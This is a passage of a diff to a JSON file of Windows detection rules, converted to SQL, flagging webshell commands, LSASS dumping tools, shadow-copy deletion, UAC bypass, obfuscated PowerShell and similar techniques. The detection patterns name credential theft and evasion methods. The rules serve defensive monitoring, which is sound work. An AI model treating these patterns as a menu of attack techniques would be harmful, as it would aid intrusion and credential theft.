'%\\\\w3wp.exe' ESCAPE '\\') AND (CommandLine LIKE '%&ipconfig&echo%' ESCAPE '\\' OR CommandLine LIKE '%&quser&echo%' ESCAPE '\\' OR CommandLine LIKE '%&whoami&echo%' ESCAPE '\\' OR CommandLine LIKE '%&c:&echo%' ESCAPE '\\' OR CommandLine LIKE '%&cd&echo%' ESCAPE '\\' OR CommandLine LIKE '%&dir&echo%' ESCAPE '\\' OR CommandLine LIKE '%&echo [E]%' ESCAPE '\\' OR CommandLine LIKE '%&echo [S]%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_hktl_htran_or_natbypass.yml" + "filename": "proc_creation_win_webshell_chopper.yml" }, { - "title": "Potential Recon Activity Using DriverQuery.EXE", - "id": "9fc3072c-dc8f-4bf7-b231-18950000fadd", - "status": "experimental", - "description": "Detect usage of the \"driverquery\" utility to perform reconnaissance on installed drivers", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "Findstr Launching .lnk File", + "id": "33339be3-148b-4e16-af56-ad16ec6c7e7b", + "status": "test", + "description": "Detects usage of findstr to identify and execute a lnk file as seen within the HHS redirect attack", + "author": "Trent Liffick", "tags": [ - "attack.discovery" + "attack.defense_evasion", + "attack.t1036", + "attack.t1202", + "attack.t1027.003" ], "falsepositives": [ "Unknown" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%driverquery.exe' ESCAPE '\\' OR OriginalFileName = 'drvqry.exe') AND ((ParentProcessName LIKE '%\\\\cmd.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\wscript.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\cscript.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\mshta.exe' ESCAPE '\\') OR (ParentProcessName LIKE '%\\\\AppData\\\\Local\\\\%' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\Windows\\\\Temp\\\\%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\findstr.exe' ESCAPE '\\' OR OriginalFileName = 'FINDSTR.EXE') AND CommandLine LIKE '%.lnk' ESCAPE '\\')" ], - "filename": "proc_creation_win_driverquery_recon.yml" + "filename": "proc_creation_win_findstr_lnk.yml" }, { - "title": "Powershell Inline Execution From A File", - "id": "ee218c12-627a-4d27-9e30-d6fb2fe22ed2", + "title": "Reg Add Suspicious Paths", + "id": "b7e2a8d4-74bb-4b78-adc9-3f92af2d4829", "status": "experimental", - "description": "Detects inline execution of PowerShell code from a file", - "author": "frack113", + "description": "Detects when an adversary uses the reg.exe utility to add or modify new keys or subkeys", + "author": "frack113, Nasreddine Bencherchali", + "tags": [ + "attack.defense_evasion", + "attack.t1112", + "attack.t1562.001" + ], "falsepositives": [ - "Unknown" + "Rare legitimate add to registry via cli (to these locations)" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND (CommandLine LIKE '%iex %' ESCAPE '\\' OR CommandLine LIKE '%Invoke-Expression %' ESCAPE '\\' OR CommandLine LIKE '%Invoke-Command %' ESCAPE '\\' OR CommandLine LIKE '%icm %' ESCAPE '\\') AND (CommandLine LIKE '%cat %' ESCAPE '\\' OR CommandLine LIKE '%get-content %' ESCAPE '\\' OR CommandLine LIKE '%type %' ESCAPE '\\') AND CommandLine LIKE '% -raw%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\reg.exe' ESCAPE '\\' OR OriginalFileName = 'reg.exe') AND (CommandLine LIKE '%\\\\AppDataLow\\\\Software\\\\Microsoft\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Policies\\\\Microsoft\\\\Windows\\\\OOBE%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Policies\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Winlogon%' ESCAPE '\\' OR CommandLine LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\Windows NT\\\\Currentversion\\\\Winlogon%' ESCAPE '\\' OR CommandLine LIKE '%\\\\CurrentControlSet\\\\Control\\\\SecurityProviders\\\\WDigest%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Microsoft\\\\Windows Defender\\\\%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_powershell_exec_data_file.yml" + "filename": "proc_creation_win_reg_susp_paths.yml" }, { - "title": "Renamed PsExec Service Execution", - "id": "51ae86a2-e2e1-4097-ad85-c46cb6851de4", + "title": "Potential Exploitation Attempt Of Undocumented WindowsServer RCE", + "id": "6d5b8176-d87d-4402-8af4-53aee9db7b5d", "status": "experimental", - "description": "Detects suspicious launch of a renamed version of the PSEXESVC service with, which is not often used by legitimate administrators", - "author": "Florian Roth (Nextron Systems)", - "tags": [ - "attack.execution" - ], + "description": "Detects potential exploitation attempt of undocumented Windows Server Pre Auth Remote Code Execution (RCE)", + "author": "Florian Roth (Nextron Systems), Nasreddine Bencherchali", "falsepositives": [ - "Legitimate administrative tasks" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND OriginalFileName = 'psexesvc.exe' AND NOT (NewProcessName LIKE 'C:\\\\Windows\\\\PSEXESVC.exe' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND ParentProcessName LIKE '%\\\\svchost.exe' ESCAPE '\\' AND NewProcessName LIKE '%\\\\svchost.exe' ESCAPE '\\' AND ParentCommandLine LIKE '%-k DHCPServer%' ESCAPE '\\' AND CommandLine LIKE '%-k DHCPServer%' ESCAPE '\\' AND (User LIKE '%NETWORK SERVICE%' ESCAPE '\\' OR User LIKE '%NETZWERKDIENST%' ESCAPE '\\' OR User LIKE '%SERVIZIO DI RETE%' ESCAPE '\\' OR User LIKE '%SERVICIO DE RED%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_renamed_sysinternals_psexec_service.yml" + "filename": "proc_creation_win_exploit_other_win_server_undocumented_rce.yml" }, { - "title": "Regsvr32 Command Line Without DLL", - "id": "50919691-7302-437f-8e10-1fe088afa145", - "status": "test", - "description": "Detects a regsvr.exe execution that doesn't contain a DLL in the command line", - "author": "Florian Roth (Nextron Systems)", + "title": "Logged-On User Password Change Via Ksetup.EXE", + "id": "c9783e20-4793-4164-ba96-d9ee483992c4", + "status": "experimental", + "description": "Detects password change for the logged-on user's via \"ksetup.exe\"", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1574", "attack.execution" ], "falsepositives": [ "Unknown" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\regsvr32.exe' ESCAPE '\\' AND NOT ((CommandLine LIKE '%.dll%' ESCAPE '\\' OR CommandLine LIKE '%.ocx%' ESCAPE '\\' OR CommandLine LIKE '%.cpl%' ESCAPE '\\' OR CommandLine LIKE '%.ax%' ESCAPE '\\' OR CommandLine LIKE '%.bav%' ESCAPE '\\' OR CommandLine LIKE '%.ppl%' ESCAPE '\\'))) AND NOT (CommandLine = '')) AND NOT (CommandLine = ''))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\ksetup.exe' ESCAPE '\\' OR OriginalFileName = 'ksetup.exe') AND CommandLine LIKE '% /ChangePassword %' ESCAPE '\\')" ], - "filename": "proc_creation_win_regsvr32_no_dll.yml" + "filename": "proc_creation_win_ksetup_password_change_user.yml" }, { - "title": "SyncAppvPublishingServer Execute Arbitrary PowerShell Code", - "id": "fbd7c32d-db2a-4418-b92c-566eb8911133", + "title": "Suspicious Greedy Compression Using Rar.EXE", + "id": "afe52666-401e-4a02-b4ff-5d128990b8cb", "status": "experimental", - "description": "Executes arbitrary PowerShell code using SyncAppvPublishingServer.exe.", - "author": "frack113", + "description": "Detects RAR usage that creates an archive from a suspicious folder, either a system folder or one of the folders often used by attackers for staging purposes", + "author": "X__Junior (Nextron Systems), Florian Roth (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1218" + "attack.execution", + "attack.t1059" ], "falsepositives": [ - "App-V clients" + "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\SyncAppvPublishingServer.exe' ESCAPE '\\' OR OriginalFileName = 'syncappvpublishingserver.exe') AND CommandLine LIKE '%\"n; %' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\rar.exe' ESCAPE '\\' OR Description = 'Command line RAR' OR (CommandLine LIKE '%.exe a %' ESCAPE '\\' OR CommandLine LIKE '% a -m%' ESCAPE '\\')) AND (CommandLine LIKE '% -hp%' ESCAPE '\\' AND CommandLine LIKE '% -r %' ESCAPE '\\' AND (CommandLine LIKE '% C:\\\\\\*.%' ESCAPE '\\' OR CommandLine LIKE '% C:\\\\\\\\\\*.%' ESCAPE '\\' OR CommandLine LIKE '% C:\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR CommandLine LIKE '% \\%public\\%%' ESCAPE '\\' OR CommandLine LIKE '% C:\\\\Windows\\\\%' ESCAPE '\\' OR CommandLine LIKE '% C:\\\\PerfLogs\\\\%' ESCAPE '\\' OR CommandLine LIKE '% C:\\\\Temp%' ESCAPE '\\' OR CommandLine LIKE '% C:\\\\$Recycle.bin\\\\%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_lolbin_syncappvpublishingserver_execute_psh.yml" + "filename": "proc_creation_win_rar_susp_greedy_compression.yml" }, { - "title": "Shadow Copies Deletion Using Operating Systems Utilities", - "id": "c947b146-0abc-4c87-9c64-b17e9d7274a2", - "status": "stable", - "description": "Shadow Copies deletion using operating systems utilities", - "author": "Florian Roth (Nextron Systems), Michael Haag, Teymur Kheirkhabarov, Daniil Yugoslavskiy, oscd.community, Andreas Hunkeler (@Karneades)", + "title": "UAC Bypass Using Windows Media Player - Process", + "id": "0058b9e5-bcd7-40d4-9205-95ca5a16d7b2", + "status": "test", + "description": "Detects the pattern of UAC Bypass using Windows Media Player osksupport.dll (UACMe 32)", + "author": "Christian Burkard (Nextron Systems)", "tags": [ "attack.defense_evasion", - "attack.impact", - "attack.t1070", - "attack.t1490" + "attack.privilege_escalation", + "attack.t1548.002" ], "falsepositives": [ - "Legitimate Administrator deletes Shadow Copies using operating systems utilities for legitimate reason", - "LANDesk LDClient Ivanti-PSModule (PS EncodedCommand)" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (((((NewProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\wmic.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\vssadmin.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\diskshadow.exe' ESCAPE '\\') OR OriginalFileName IN ('PowerShell.EXE', 'pwsh.dll', 'wmic.exe', 'VSSADMIN.EXE', 'diskshadow.exe')) AND (CommandLine LIKE '%shadow%' ESCAPE '\\' AND CommandLine LIKE '%delete%' ESCAPE '\\')) OR ((NewProcessName LIKE '%\\\\wbadmin.exe' ESCAPE '\\' OR OriginalFileName = 'WBADMIN.EXE') AND (CommandLine LIKE '%delete%' ESCAPE '\\' AND CommandLine LIKE '%catalog%' ESCAPE '\\' AND CommandLine LIKE '%quiet%' ESCAPE '\\'))) OR ((NewProcessName LIKE '%\\\\vssadmin.exe' ESCAPE '\\' OR OriginalFileName = 'VSSADMIN.EXE') AND (CommandLine LIKE '%resize%' ESCAPE '\\' AND CommandLine LIKE '%shadowstorage%' ESCAPE '\\' AND (CommandLine LIKE '%unbounded%' ESCAPE '\\' OR CommandLine LIKE '%/MaxSize=%' ESCAPE '\\')))))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE 'C:\\\\Program Files\\\\Windows Media Player\\\\osk.exe' ESCAPE '\\' AND IntegrityLevel IN ('High', 'System')) OR (NewProcessName LIKE 'C:\\\\Windows\\\\System32\\\\cmd.exe' ESCAPE '\\' AND ParentCommandLine LIKE '\"C:\\\\Windows\\\\system32\\\\mmc.exe\" \"C:\\\\Windows\\\\system32\\\\eventvwr.msc\" /s' ESCAPE '\\' AND IntegrityLevel IN ('High', 'System'))))" ], - "filename": "proc_creation_win_susp_shadow_copies_deletion.yml" + "filename": "proc_creation_win_uac_bypass_wmp.yml" }, { - "title": "DumpMinitool Usage", - "id": "dee0a7a3-f200-4112-a99b-952196d81e42", + "title": "HackTool - Inveigh Execution", + "id": "b99a1518-1ad5-4f65-bc95-1ffff97a8fd0", "status": "experimental", - "description": "Detects the use of \"DumpMinitool.exe\" a tool bundled with Visual Studio and DotNTET", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects the use of Inveigh a cross-platform .NET IPv4/IPv6 machine-in-the-middle tool", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1036", + "attack.credential_access", "attack.t1003.001" ], "falsepositives": [ - "Unknown" + "Very unlikely" ], - "level": "medium", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\DumpMinitool.exe' ESCAPE '\\' OR OriginalFileName = 'DumpMinitool.exe') OR (CommandLine LIKE '% --processId %' ESCAPE '\\' AND CommandLine LIKE '% --dumpType Full%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\Inveigh.exe' ESCAPE '\\' OR (OriginalFileName LIKE '\\\\Inveigh.exe' ESCAPE '\\' OR OriginalFileName LIKE '\\\\Inveigh.dll' ESCAPE '\\') OR Description = 'Inveigh' OR (CommandLine LIKE '% -SpooferIP%' ESCAPE '\\' OR CommandLine LIKE '% -ReplyToIPs %' ESCAPE '\\' OR CommandLine LIKE '% -ReplyToDomains %' ESCAPE '\\' OR CommandLine LIKE '% -ReplyToMACs %' ESCAPE '\\' OR CommandLine LIKE '% -SnifferIP%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_dumpminitool_execution.yml" + "filename": "proc_creation_win_hktl_inveigh.yml" }, { - "title": "HackTool - SecurityXploded Execution", - "id": "7679d464-4f74-45e2-9e01-ac66c5eb041a", - "status": "stable", - "description": "Detects the execution of SecurityXploded Tools", + "title": "Renamed AdFind Execution", + "id": "df55196f-f105-44d3-a675-e9dfb6cc2f2b", + "status": "test", + "description": "Detects the use of a renamed Adfind.exe. AdFind continues to be seen across majority of breaches. It is used to domain trust discovery to plan out subsequent steps in the attack chain.", "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.credential_access", - "attack.t1555" + "attack.discovery", + "attack.t1018", + "attack.t1087.002", + "attack.t1482", + "attack.t1069.002" ], "falsepositives": [ - "Unlikely" + "Unknown" ], - "level": "critical", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (Company = 'SecurityXploded' OR NewProcessName LIKE '%PasswordDump.exe' ESCAPE '\\' OR OriginalFileName LIKE '%PasswordDump.exe' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((CommandLine LIKE '%domainlist%' ESCAPE '\\' OR CommandLine LIKE '%trustdmp%' ESCAPE '\\' OR CommandLine LIKE '%dcmodes%' ESCAPE '\\' OR CommandLine LIKE '%adinfo%' ESCAPE '\\' OR CommandLine LIKE '% dclist %' ESCAPE '\\' OR CommandLine LIKE '%computer\\_pwdnotreqd%' ESCAPE '\\' OR CommandLine LIKE '%objectcategory=%' ESCAPE '\\' OR CommandLine LIKE '%-subnets -f%' ESCAPE '\\' OR CommandLine LIKE '%name=\"Domain Admins\"%' ESCAPE '\\' OR CommandLine LIKE '%-sc u:%' ESCAPE '\\' OR CommandLine LIKE '%domainncs%' ESCAPE '\\' OR CommandLine LIKE '%dompol%' ESCAPE '\\' OR CommandLine LIKE '% oudmp %' ESCAPE '\\' OR CommandLine LIKE '%subnetdmp%' ESCAPE '\\' OR CommandLine LIKE '%gpodmp%' ESCAPE '\\' OR CommandLine LIKE '%fspdmp%' ESCAPE '\\' OR CommandLine LIKE '%users\\_noexpire%' ESCAPE '\\' OR CommandLine LIKE '%computers\\_active%' ESCAPE '\\' OR CommandLine LIKE '%computers\\_pwdnotreqd%' ESCAPE '\\') OR Imphash IN ('bca5675746d13a1f246e2da3c2217492', '53e117a96057eaf19c41380d0e87f1c2') OR (Hashes LIKE '%IMPHASH=BCA5675746D13A1F246E2DA3C2217492%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=53E117A96057EAF19C41380D0E87F1C2%' ESCAPE '\\') OR OriginalFileName = 'AdFind.exe') AND NOT (NewProcessName LIKE '%\\\\AdFind.exe' ESCAPE '\\'))" ], - "filename": "proc_creation_win_hktl_secutyxploded.yml" + "filename": "proc_creation_win_renamed_adfind.yml" }, { - "title": "Abusing Print Executable", - "id": "bafac3d6-7de9-4dd9-8874-4a1194b493ed", - "status": "test", - "description": "Attackers can use print.exe for remote file copy", - "author": "Furkan CALISKAN, @caliskanfurkan_, @oscd_initiative", - "tags": [ - "attack.defense_evasion", - "attack.t1218" - ], + "title": "Suspicious WERMGR Process Patterns", + "id": "396f6630-f3ac-44e3-bfc8-1b161bc00c4e", + "status": "experimental", + "description": "Detects suspicious Windows Error Reporting manager (wermgr.exe) process patterns - suspicious parents / children, execution folders, command lines etc.", + "author": "Florian Roth (Nextron Systems)", "falsepositives": [ "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\print.exe' ESCAPE '\\' AND CommandLine LIKE 'print%' ESCAPE '\\' AND CommandLine LIKE '%/D%' ESCAPE '\\' AND CommandLine LIKE '%.exe%' ESCAPE '\\') AND NOT (CommandLine LIKE '%print.exe%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((ParentProcessName LIKE '%\\\\wermgr.exe' ESCAPE '\\' AND (NewProcessName LIKE '%\\\\nslookup.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\ipconfig.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\net.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\net1.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\whoami.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\netstat.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\systeminfo.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\cmd.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\')) OR (NewProcessName LIKE '%\\\\wermgr.exe' ESCAPE '\\' AND NOT ((NewProcessName LIKE 'C:\\\\Windows\\\\System32\\\\%' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Windows\\\\SysWOW64\\\\%' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Windows\\\\WinSxS\\\\%' ESCAPE '\\')))))" ], - "filename": "proc_creation_win_print_remote_file_copy.yml" + "filename": "proc_creation_win_wermgr_susp_child_process.yml" }, { - "title": "Set Suspicious Files as System Files Using Attrib.EXE", - "id": "efec536f-72e8-4656-8960-5e85d091345b", - "status": "experimental", - "description": "Detects the usage of attrib with the \"+s\" option to set scripts or executables located in suspicious locations as system files to hide them from users and make them unable to be deleted with simple rights. The rule limits the search to specific extensions and directories to avoid FPs\n", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "HackTool - CreateMiniDump Execution", + "id": "36d88494-1d43-4dc0-b3fa-35c8fea0ca9d", + "status": "test", + "description": "Detects the use of CreateMiniDump hack tool used to dump the LSASS process memory for credential extraction on the attacker's machine", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1564.001" + "attack.credential_access", + "attack.t1003.001" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\attrib.exe' ESCAPE '\\' OR OriginalFileName = 'ATTRIB.EXE') AND CommandLine LIKE '% +s%' ESCAPE '\\' AND (CommandLine LIKE '% \\%%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\AppData\\\\Local\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\ProgramData\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Downloads\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Windows\\\\Temp\\\\%' ESCAPE '\\') AND (CommandLine LIKE '%.bat%' ESCAPE '\\' OR CommandLine LIKE '%.dll%' ESCAPE '\\' OR CommandLine LIKE '%.exe%' ESCAPE '\\' OR CommandLine LIKE '%.hta%' ESCAPE '\\' OR CommandLine LIKE '%.ps1%' ESCAPE '\\' OR CommandLine LIKE '%.vbe%' ESCAPE '\\' OR CommandLine LIKE '%.vbs%' ESCAPE '\\')) AND NOT (CommandLine LIKE '%\\\\Windows\\\\TEMP\\\\%' ESCAPE '\\' AND CommandLine LIKE '%.exe%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\CreateMiniDump.exe' ESCAPE '\\' OR Imphash = '4a07f944a83e8a7c2525efa35dd30e2f' OR Hashes LIKE '%IMPHASH=4a07f944a83e8a7c2525efa35dd30e2f%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_attrib_system_susp_paths.yml" + "filename": "proc_creation_win_hktl_createminidump.yml" }, { - "title": "Use of PktMon.exe", - "id": "f956c7c1-0f60-4bc5-b7d7-b39ab3c08908", - "status": "test", - "description": "Tools to Capture Network Packets on the windows 10 with October 2018 Update or later.", - "author": "frack113", + "title": "Phishing Pattern ISO in Archive", + "id": "fcdf69e5-a3d3-452a-9724-26f2308bf2b1", + "status": "experimental", + "description": "Detects cases in which an ISO files is opend within an archiver like 7Zip or Winrar, which is a sign of phishing as threat actors put small ISO files in archives as email attachments to bypass certain filters and protective measures (mark of web)", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.credential_access", - "attack.t1040" + "attack.initial_access", + "attack.t1566" ], "falsepositives": [ - "Legitimate use" + "Legitimate cases in which archives contain ISO or IMG files and the user opens the archive and the image via clicking and not extraction" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\pktmon.exe' ESCAPE '\\' OR OriginalFileName = 'PktMon.exe'))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND (ParentProcessName LIKE '%\\\\Winrar.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\7zFM.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\peazip.exe' ESCAPE '\\') AND (NewProcessName LIKE '%\\\\isoburn.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\PowerISO.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\ImgBurn.exe' ESCAPE '\\'))" ], - "filename": "proc_creation_win_lolbin_pktmon.yml" + "filename": "proc_creation_win_susp_archiver_iso_phishing.yml" }, { - "title": "CL_Mutexverifiers.ps1 Proxy Execution", - "id": "1e0e1a81-e79b-44bc-935b-ddb9c8006b3d", + "title": "Potential Dosfuscation Activity", + "id": "a77c1610-fc73-4019-8e29-0f51efc04a51", "status": "experimental", - "description": "Detects the use of a Microsoft signed script to execute commands", - "author": "oscd.community, Natalia Shornikova, frack113", + "description": "Detects possible payload obfuscation via the commandline", + "author": "frack113, Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1216" + "attack.execution", + "attack.t1059" ], "falsepositives": [ "Unknown" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND CommandLine LIKE '%\\\\CL\\_Mutexverifiers.ps1%' ESCAPE '\\' AND CommandLine LIKE '%runAfterCancelProcess %' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND (CommandLine LIKE '%^^%' ESCAPE '\\' OR CommandLine LIKE '%^|^%' ESCAPE '\\' OR CommandLine LIKE '%,;,%' ESCAPE '\\' OR CommandLine LIKE '%;;;;%' ESCAPE '\\' OR CommandLine LIKE '%;; ;;%' ESCAPE '\\' OR CommandLine LIKE '%(,(,%' ESCAPE '\\' OR CommandLine LIKE '%\\%COMSPEC:~%' ESCAPE '\\' OR CommandLine LIKE '% c^m^d%' ESCAPE '\\' OR CommandLine LIKE '%^c^m^d%' ESCAPE '\\' OR CommandLine LIKE '% c^md%' ESCAPE '\\' OR CommandLine LIKE '% cm^d%' ESCAPE '\\' OR CommandLine LIKE '%^cm^d%' ESCAPE '\\' OR CommandLine LIKE '% s^et %' ESCAPE '\\' OR CommandLine LIKE '% s^e^t %' ESCAPE '\\' OR CommandLine LIKE '% se^t %' ESCAPE '\\'))" ], - "filename": "proc_creation_win_lolbin_cl_mutexverifiers.yml" + "filename": "proc_creation_win_cmd_dosfuscation.yml" }, { - "title": "Regsvr32 Spawning Explorer", - "id": "6f0947a4-1c5e-4e0d-8ac7-53159b8f23ca", - "status": "experimental", - "description": "Detects \"regsvr32.exe\" spawning \"explorer.exe\", which is very uncommon.", - "author": "elhoim", + "title": "Suspicious Encoded And Obfuscated Reflection Assembly Load Function Call", + "id": "9c0295ce-d60d-40bd-bd74-84673b7592b1", + "status": "test", + "description": "Detects suspicious base64 encoded and obfuscated \"LOAD\" keyword used in .NET \"reflection.assembly\"", + "author": "pH-T (Nextron Systems)", "tags": [ + "attack.execution", "attack.defense_evasion", - "attack.t1218.010" + "attack.t1059.001", + "attack.t1027" ], "falsepositives": [ - "Unknown" + "Unlikely" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND ParentProcessName LIKE '%\\\\regsvr32.exe' ESCAPE '\\' AND NewProcessName LIKE '%\\\\explorer.exe' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND (CommandLine LIKE '%OgA6ACgAIgBMACIAKwAiAG8AYQBkACIAKQ%' ESCAPE '\\' OR CommandLine LIKE '%oAOgAoACIATAAiACsAIgBvAGEAZAAiACkA%' ESCAPE '\\' OR CommandLine LIKE '%6ADoAKAAiAEwAIgArACIAbwBhAGQAIgApA%' ESCAPE '\\' OR CommandLine LIKE '%OgA6ACgAIgBMAG8AIgArACIAYQBkACIAKQ%' ESCAPE '\\' OR CommandLine LIKE '%oAOgAoACIATABvACIAKwAiAGEAZAAiACkA%' ESCAPE '\\' OR CommandLine LIKE '%6ADoAKAAiAEwAbwAiACsAIgBhAGQAIgApA%' ESCAPE '\\' OR CommandLine LIKE '%OgA6ACgAIgBMAG8AYQAiACsAIgBkACIAKQ%' ESCAPE '\\' OR CommandLine LIKE '%oAOgAoACIATABvAGEAIgArACIAZAAiACkA%' ESCAPE '\\' OR CommandLine LIKE '%6ADoAKAAiAEwAbwBhACIAKwAiAGQAIgApA%' ESCAPE '\\' OR CommandLine LIKE '%OgA6ACgAJwBMACcAKwAnAG8AYQBkACcAKQ%' ESCAPE '\\' OR CommandLine LIKE '%oAOgAoACcATAAnACsAJwBvAGEAZAAnACkA%' ESCAPE '\\' OR CommandLine LIKE '%6ADoAKAAnAEwAJwArACcAbwBhAGQAJwApA%' ESCAPE '\\' OR CommandLine LIKE '%OgA6ACgAJwBMAG8AJwArACcAYQBkACcAKQ%' ESCAPE '\\' OR CommandLine LIKE '%oAOgAoACcATABvACcAKwAnAGEAZAAnACkA%' ESCAPE '\\' OR CommandLine LIKE '%6ADoAKAAnAEwAbwAnACsAJwBhAGQAJwApA%' ESCAPE '\\' OR CommandLine LIKE '%OgA6ACgAJwBMAG8AYQAnACsAJwBkACcAKQ%' ESCAPE '\\' OR CommandLine LIKE '%oAOgAoACcATABvAGEAJwArACcAZAAnACkA%' ESCAPE '\\' OR CommandLine LIKE '%6ADoAKAAnAEwAbwBhACcAKwAnAGQAJwApA%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_regsvr32_spawn_explorer.yml" + "filename": "proc_creation_win_powershell_base64_reflection_assembly_load_obfusc.yml" }, { - "title": "Trickbot Malware Activity", - "id": "58bf96d9-ff5f-44bd-8dcc-1c4f79bf3a27", - "status": "stable", - "description": "Detects Trickbot malware process tree pattern in which \"rundll32.exe\" is a parent of \"wermgr.exe\"", - "author": "Florian Roth (Nextron Systems)", + "title": "New Root Certificate Installed Via CertMgr.EXE", + "id": "ff992eac-6449-4c60-8c1d-91c9722a1d48", + "status": "test", + "description": "Detects execution of \"certmgr\" with the \"add\" flag in order to install a new certificate on the system.\nAdversaries may install a root certificate on a compromised system to avoid warnings when connecting to adversary controlled web servers.\n", + "author": "oscd.community, @redcanary, Zach Stanford @svch0st", "tags": [ - "attack.execution", - 